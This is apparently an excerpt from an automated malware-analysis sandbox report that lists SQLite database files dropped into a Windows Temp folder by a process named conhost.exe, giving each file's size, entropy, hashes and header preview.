                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\6EGHrLU0vt

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\6J9ChqA1b4

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\6ZJQ6CCfnc

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\6ZWUupkEGN

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\6e2TaqttNM

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\6s1ziqsIZc

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\75aflUCIGP

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\7F3R8PyIkY

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\7VBuABSra7

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\7hXzMxXBcs

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\7zg8VazFlR

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\8B9aVxycY9

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\8rXEZe6CF9

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\9WjvQxChlE

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\9bqTQD7mg4

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\9nUVX9qu0n

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\9tsrFuWIFr

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ACTMglw1Qq

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ArqBHgCW2A

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\AzFu3DMnII

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\B91mR4iHlu

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\BDY3PUpcIe

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\BO1PqXaXQw

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
